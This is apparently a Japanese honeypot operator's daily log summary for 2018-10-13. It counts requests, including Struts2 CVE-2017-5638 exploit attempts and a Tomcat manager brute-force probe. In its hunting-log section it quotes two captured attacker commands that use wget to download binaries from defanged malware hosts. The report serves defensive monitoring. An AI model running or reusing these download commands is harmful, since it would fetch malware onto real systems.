ハニーポットのログ分析(2018/10/13)
WOWhoneypotの2018/10/13(土) (運用130日目)の簡易分析です。
本日の総アクセス件数は 32件です。
少なすぎですが、障害が起きていたとかではないようです。
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
22 | 2018-10-13 | アクセス | GET / |
8 | 2018-10-13 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
1 | 2018-10-13 | クローリング | GET /robots.txt |
1 | 2018-10-13 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。前日に引き続きStruts2を狙うものです。全て同じIPから5分程度の間に来ています。
3 2018-10-13 wget -c hxxp://wap.tfddos[.]net:57843/linux
2 2018-10-13 wget -c hxxp://43.226.146[.]23:55335/hhkkkyyy
以上です。